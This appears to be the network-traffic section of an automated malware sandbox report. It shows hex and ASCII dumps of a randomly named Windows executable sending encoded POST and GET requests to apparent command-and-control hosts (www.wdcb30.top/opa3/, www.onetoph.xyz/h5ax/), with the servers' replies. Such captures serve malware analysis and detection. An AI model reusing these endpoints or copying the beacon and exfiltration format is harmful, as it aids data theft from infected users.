                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_jq7WvaVVw2GzTWUtO3e1k/AlZy2zLW2ruPCVetemRPT8v48eBW20rMd118dofOTeJ2ImRdG+8A0gaar3j7dyYQ==
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Sep 24, 2024 11:26:12.612488031 CEST333INData Raw: 61 35 31 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c
                                              Data Ascii: a512<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">
                                              Sep 24, 2024 11:26:12.612545967 CEST1220INData Raw: 3b 20 69 66 28 21 22 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69
                                              Data Ascii: ; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if
                                              Sep 24, 2024 11:26:12.612606049 CEST1220INData Raw: 69 6e 67 22 26 26 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 21 3d 3d 22 22 29 7b 72 65 74 75 72 6e 20 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 7d 76 61 72 20 67 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73
                                              Data Ascii: ing"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.s
                                              Sep 24, 2024 11:26:12.612660885 CEST1220INData Raw: 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 71 5d 2e 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3d 3d 6f 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7b 6f 3d 22 65 6e 22 3b 62 72 65 61 6b 7d 7d 7d 62 3d 22 5f 22 2b 6f
                                              Data Ascii: (h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-
                                              Sep 24, 2024 11:26:12.612718105 CEST1220INData Raw: 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 6a 2e 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22
                                              Data Ascii: 1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v(
                                              Sep 24, 2024 11:26:12.612773895 CEST1220INData Raw: 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3b 69 66 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77
                                              Data Ascii: ment.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidd
                                              Sep 24, 2024 11:26:12.612829924 CEST1220INData Raw: 61 5b 30 5d 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 7c 7c 61 5b 30 5d 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70
                                              Data Ascii: a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpSt
                                              Sep 24, 2024 11:26:12.612885952 CEST1220INData Raw: 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 46 69 65 6c 64 22 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70
                                              Data Ascii: tion"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&
                                              Sep 24, 2024 11:26:12.612942934 CEST1220INData Raw: 73 69 6f 6e 3a 31 29 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22
                                              Data Ascii: sion:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandl
                                              Sep 24, 2024 11:26:12.613013029 CEST1220INData Raw: 47 70 70 53 74 75 62 28 22 5f 5f 67 70 70 22 29 7d 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74
                                              Data Ascii: GppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.brainchainllc.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.brainchainllc.online/px.js?ch=2"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.11.3049894206.119.82.131804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:26:28.640413046 CEST755OUTPOST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 79 39 55 74 35 34 53 49 67 77 74 38 30 6e 50 6d 57 6e 33 63 48 45 6c 38 58 47 41 50 70 58 48 78 72 58 47 70 4a 46 62 56 44 76 58 38 4e 76 4e 71 47 53 66 2f 4b 2b 2f 41 65 44 4b 63 56 33 6d 31 74 50 51 69 4e 31 35 49 4a 4c 5a 70 66 4e 59 48 66 4f 51 6d 5a 2b 54 58 54 63 55 75 67 73 4a 62 48 4b 30 65 42 46 47 4c 4e 59 79 32 4c 41 46 54 4f 6f 4b 68 46 6a 65 42 6e 67 4f 5a 6e 32 73 2f 58 79 73 5a 59 5a 39 6f 42 6b 43 71 48 70 73 69 59 5a 38 2f 64 59 65 42 4e 31 76 6f 59 37 70 67 51 52 38 79 45 64 5a 52 42 4e 44 58 37 48 66 6e 5a 46 79 58 34 4e 71 53 2b 74 48 42 64 56 6c 75 4a 77 3d 3d
                                              Data Ascii: 7LY=y9Ut54SIgwt80nPmWn3cHEl8XGAPpXHxrXGpJFbVDvX8NvNqGSf/K+/AeDKcV3m1tPQiN15IJLZpfNYHfOQmZ+TXTcUugsJbHK0eBFGLNYy2LAFTOoKhFjeBngOZn2s/XysZYZ9oBkCqHpsiYZ8/dYeBN1voY7pgQR8yEdZRBNDX7HfnZFyX4NqS+tHBdVluJw==
                                              Sep 24, 2024 11:26:28.955558062 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:26:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.11.3049895206.119.82.131804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:26:31.509268999 CEST775OUTPOST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 79 39 55 74 35 34 53 49 67 77 74 38 30 47 2f 6d 52 45 66 63 53 55 6c 39 53 47 41 50 6a 33 48 31 72 58 4b 70 4a 45 76 46 44 62 37 38 4f 4e 56 71 46 54 66 2f 4a 2b 2f 41 56 6a 4b 46 52 33 6d 75 74 4f 74 58 4e 33 39 49 4a 4c 39 70 66 50 41 48 65 35 45 68 59 75 54 56 65 38 55 73 2b 63 4a 62 48 4b 30 65 42 47 37 44 4e 59 36 32 58 6a 64 54 4f 4b 69 69 4d 44 65 65 33 41 4f 5a 74 57 74 58 58 79 74 38 59 62 4a 57 42 69 4f 71 48 72 30 69 59 4c 55 77 4f 34 65 44 43 56 75 4d 63 35 73 52 52 54 63 37 4e 4f 30 4a 59 63 36 72 36 51 75 39 45 47 47 56 72 74 57 2f 69 73 71 70 66 58 6b 31 55 77 74 79 72 38 33 70 33 4c 64 54 31 36 70 76 76 33 57 4a 2b 46 34 3d
                                              Data Ascii: 7LY=y9Ut54SIgwt80G/mREfcSUl9SGAPj3H1rXKpJEvFDb78ONVqFTf/J+/AVjKFR3mutOtXN39IJL9pfPAHe5EhYuTVe8Us+cJbHK0eBG7DNY62XjdTOKiiMDee3AOZtWtXXyt8YbJWBiOqHr0iYLUwO4eDCVuMc5sRRTc7NO0JYc6r6Qu9EGGVrtW/isqpfXk1Uwtyr83p3LdT16pvv3WJ+F4=
                                              Sep 24, 2024 11:26:31.834949017 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:26:31 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.11.3049896206.119.82.131804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:26:34.359229088 CEST3892OUTPOST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 79 39 55 74 35 34 53 49 67 77 74 38 30 47 2f 6d 52 45 66 63 53 55 6c 39 53 47 41 50 6a 33 48 31 72 58 4b 70 4a 45 76 46 44 62 7a 38 4e 2b 64 71 46 77 6e 2f 49 2b 2f 41 63 44 4b 41 52 33 6e 75 74 50 46 62 4e 33 67 39 4a 4e 35 70 5a 75 67 48 57 73 6f 68 53 75 54 56 58 63 55 74 67 73 4a 4f 48 4b 6b 61 42 46 44 44 4e 59 36 32 58 69 74 54 49 59 4b 69 4b 44 65 42 6e 67 4f 6a 6e 32 74 73 58 79 31 4b 59 62 64 47 42 67 75 71 48 59 4d 69 5a 34 38 77 4f 34 65 44 61 46 75 4e 63 34 51 55 52 54 30 52 4e 4b 42 38 59 49 43 72 37 30 33 61 55 31 48 43 2f 4d 6a 38 2f 39 47 43 65 57 4d 47 53 58 64 4c 69 39 4c 2b 77 4a 5a 64 30 4e 4e 62 77 30 58 54 39 69 45 49 70 58 75 43 45 59 4f 68 4e 2f 6e 61 74 6c 30 35 2f 71 75 6d 6d 4e 35 42 79 78 76 4d 61 41 34 42 2b 6c 78 49 48 73 36 66 36 6c 56 7a 30 44 37 6d 67 53 71 63 4c 54 65 30 62 6d 2b 71 4f 6a 68 54 30 57 64 31 41 5a 33 71 39 2b 7a 2b 4c 36 72 53 31 2f 52 68 46 58 45 32 48 34 59 79 44 74 4a 5a 6c 50 55 56 6c 2b 41 64 50 6a 63 36 77 58 78 71 69 4a 37 6c 6b 4c [TRUNCATED]
                                              Data Ascii: 7LY=y9Ut54SIgwt80G/mREfcSUl9SGAPj3H1rXKpJEvFDbz8N+dqFwn/I+/AcDKAR3nutPFbN3g9JN5pZugHWsohSuTVXcUtgsJOHKkaBFDDNY62XitTIYKiKDeBngOjn2tsXy1KYbdGBguqHYMiZ48wO4eDaFuNc4QURT0RNKB8YICr703aU1HC/Mj8/9GCeWMGSXdLi9L+wJZd0NNbw0XT9iEIpXuCEYOhN/natl05/qummN5ByxvMaA4B+lxIHs6f6lVz0D7mgSqcLTe0bm+qOjhT0Wd1AZ3q9+z+L6rS1/RhFXE2H4YyDtJZlPUVl+AdPjc6wXxqiJ7lkLho97TjZ7Mcd1TBNURlRMV0DGcV3X+bDjEze0tylQd0tMXqkSH9aeQlv9I52RyhKbzaiTsBGDp1wweT4Gu7DWXO1AwoWbN7WWzVOmKoG5ahOY5s5aTXzo04mNjmqqfwgNi0Nm0JNXpIw3cQ95V5rHCGPS71Ki82gXIP1kQaHoi/ajemrQKEE6pd6QhuR1OxMFbwzNakWyfq00pDEEnlCHAURTLWEainUCfYg/WcVwtdvA6YUnXqYoiPGkKXe+ctSTNSnNN1pEcExtV1AVF/KYwmZxxYa0qHEuCRsuc7V03QFkOLh0LFdfw9WhHUBsXgQsIwCevuZm+n0VuPkMEb+ZjbHY5q8Uv70FV/XAQ3D2iXx6oFvgvIfDCIkGt68LytFv0aiUm4OK10mj7kYDVPMdrF/F4kVtUekmqbsV/2OL+NsLSrA1xLMu1pfLDJ/3zDPynDXLCyJ+BxY54nHZA2d8A65ZcA5JDIbG/4tBV97nOZUdB/blTZkgmGofL/HLcq5VXZWF2wLSGtS6KkNvF8zk9atYaBB1RH68oTNsItUfeXbT3K+agSAyA/lPC0Ku6l7m5ySZepKhXEn5TwExHFWD7qrkYrbd9xymGuDJM4ldGqfJZTsXqbZoLP8MRCta9Ut+aaHL3aBgHKZyQRZOMSg8NHBNBb3rAfyD9i [TRUNCATED]
                                              Sep 24, 2024 11:26:34.677422047 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:26:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.11.3049897206.119.82.131804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:26:37.210061073 CEST490OUTGET /opa3/?7LY=//8N6NGdtRkn6yq8W3OBQnInDVkPrmeKzEa9OWHVIp2tO8AGOHzwJOfidi6bYHK8g9UFVHI1UtpxcaY/CfI8S9y/PcE6w9RcCLRpAW2RNdWqNgB6ObbfL00=&Nze=C0klVT HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:26:37.629518986 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:26:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.11.3049898209.74.95.29804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:26:42.938011885 CEST758OUTPOST /h5ax/ HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 71 30 67 64 30 44 6d 34 5a 30 58 4e 31 74 4d 35 7a 36 72 63 37 65 72 6d 59 6e 62 66 56 6e 66 79 4e 51 66 4d 46 75 4f 35 6e 53 53 78 43 65 67 4c 31 32 72 6a 31 38 4d 67 65 53 48 4b 61 7a 7a 2f 38 63 6e 45 31 69 48 4c 44 54 71 45 63 65 67 65 35 2f 33 45 70 47 69 4b 65 77 4f 79 74 69 33 30 45 4e 7a 50 36 53 4c 44 58 72 6a 72 59 2f 30 4c 76 64 74 68 2b 7a 55 44 74 53 79 36 42 64 7a 33 54 62 4c 46 42 48 48 39 74 34 43 2f 49 77 64 76 76 43 53 65 57 58 68 4b 56 72 34 6f 6b 69 70 46 77 53 52 4e 4a 61 63 55 68 7a 59 6c 32 48 34 30 45 47 54 46 42 50 79 2b 43 69 51 66 66 46 39 33 34 67 3d 3d
                                              Data Ascii: 7LY=q0gd0Dm4Z0XN1tM5z6rc7ermYnbfVnfyNQfMFuO5nSSxCegL12rj18MgeSHKazz/8cnE1iHLDTqEcege5/3EpGiKewOyti30ENzP6SLDXrjrY/0Lvdth+zUDtSy6Bdz3TbLFBHH9t4C/IwdvvCSeWXhKVr4okipFwSRNJacUhzYl2H40EGTFBPy+CiQffF934g==
                                              Sep 24, 2024 11:26:43.121496916 CEST1289INHTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:26:43 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                              Sep 24, 2024 11:26:43.121618986 CEST1289INData Raw: 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20
                                              Data Ascii: l.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><body>
                                              Sep 24, 2024 11:26:43.121687889 CEST1289INData Raw: 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6e 61 76
                                              Data Ascii: ype="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id
